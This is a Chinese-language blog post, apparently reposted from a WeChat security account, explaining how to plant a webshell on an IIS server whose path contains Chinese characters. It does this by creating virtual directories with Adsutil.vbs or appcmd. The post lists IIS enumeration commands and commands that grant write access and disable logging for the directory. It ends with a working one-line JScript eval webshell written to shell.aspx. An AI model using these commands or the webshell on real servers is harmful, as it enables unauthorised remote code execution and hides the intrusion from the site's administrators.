利用IIS虚拟目录写马至中文路径

admin
admin
admin
104745
文章
87
评论
2022年4月24日13:15:01评论72 views字数 2381阅读7分56秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


这篇是根据以前写的那两篇文章做的补充,可以参考下:


0x01 前言

知识星球看到@紫陌师傅分享的一篇《利用IIS虚拟目录绕过os-shell中文目录》,所以想着对他文中提到的利用Adsutil.vbs脚本创建虚拟目录写马至中文路径的方式进行复现,但仅适用于低版本IIS,高版本要用appcmd。


0x02 思路分享

Adsutil.vbs是Windows系统自带的一个脚本,可用于命令行下管理IIS,默认在C:inetpubAdminScripts目录下,但只在IIS6默认会有这个脚本,IIS7及以上需要单独安装“IIS6脚本工具”组件才有。

利用IIS虚拟目录写马至中文路径

我们可以通过执行Adsutil.vbs脚本获取目标网站的各种信息,如:网站ID、绑定域名、应用程序池和查看/创建/删除虚拟目录等,实战场景中还得去删除下创建的虚拟目录,否则可能一直存在。


主要用到命令:

所有网站ID:cscript.exe c:inetpubadminscriptsadsutil.vbs enum /P W3SVC对象绑定信息:cscript.exe c:inetpubadminscriptsadsutil.vbs get w3svc/2/serverbindings创建虚拟目录:cscript.exe c:inetpubadminscriptsadsutil.vbs create w3svc/2/root/hacking/ IisWebVirtualDir删除虚拟目录:cscript.exe c:inetpubadminscriptsadsutil.vbs delete w3svc/2/root/hacking设置物理路径:cscript.exe c:inetpubadminscriptsadsutil.vbs set w3svc/2/root/hacking/path C:ProgramDatatesting


其他常用命令:

IIS应用池名:cscript.exe C:inetpubAdminScriptsadsutil.vbs enum /P W3SVC/APPPOOLSIIS应用池信息:cscript.exe C:inetpubAdminScriptsadsutil.vbs enum W3SVC/APPPOOLS/DefaultAppPool对象虚拟目录:cscript.exe c:inetpubAdminScriptsadsutil.vbs enum w3svc/2/root不设置日志:cscript.exe c:inetpubadminscriptsadsutil.vbs set w3svc/2/root/hacking/DontLog 1设置写权限:cscript.exe c:inetpubadminscriptsadsutil.vbs set w3svc/2/root/hacking/accesswrite 1设置读权限:cscript.exe c:inetpubadminscriptsadsutil.vbs set w3svc/2/root/hacking/accessread 1可列目录权限:cscript.exe c:inetpubadminscriptsadsutil.vbs set w3svc/2/root/hacking/enabledirbrowsing 1启动2号Web服务:cscript.exe c:inetpubadminscriptsadsutil.vbs start_server w3svc/2
利用IIS虚拟目录写马至中文路径

遇到IIS7及以上场景时我们也可以通过执行appcmd获取IIS中的所有网站名称和对应的物理路径,快速定位到目标网站的绝对路径,也能查看/创建/删除虚拟目录等,方便我们写马至中文路径。

查看虚拟目录:C:WindowsSystem32inetsrvappcmd list vdir
创建虚拟目录:C:WindowsSystem32inetsrvappcmd add vdir /app.name:www.testing.com/ /path:/hacking1 /physicalPath:C:ProgramDatatesting1
删除虚拟目录:C:WindowsSystem32inetsrvappcmd delete vdir "www.testing.com/hacking1"
利用IIS虚拟目录写马至中文路径

注:使用appcmd创建虚拟目录时得注意下格式,app.name网站名称,path虚拟目录别名,physicalPath物理路径,还得注意app.name、path中的/,这两斜杠都需要保留,否则可能会出错。

利用IIS虚拟目录写马至中文路径

使用Adsutil.vbs脚本或appcmd建立虚拟目录后就可以无视目标网站物理路径中存在的中文字符了。


因为这是直接往虚拟目录中写入文件,所以可以成功将Webshell写入至中文路径,如下图所示...。

echo ^<%%@ Page Language="Jscript"%%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%%^> > C:inetpubwwwroot中文测试shell.aspx
利用IIS虚拟目录写马至中文路径

关 注 有 礼



关注公众号回复“9527”可以免费领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”在线杀软对比源码+数据源。

利用IIS虚拟目录写马至中文路径 还在等什么?赶紧点击下方名片关注学习吧!利用IIS虚拟目录写马至中文路径

推 荐 阅 读




利用IIS虚拟目录写马至中文路径
利用IIS虚拟目录写马至中文路径
利用IIS虚拟目录写马至中文路径

欢 迎 私 下 骚 扰



利用IIS虚拟目录写马至中文路径

原文始发于微信公众号(潇湘信安):利用IIS虚拟目录写马至中文路径

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月24日13:15:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用IIS虚拟目录写马至中文路径https://cn-sec.com/archives/937591.html

发表评论

匿名网友 填写信息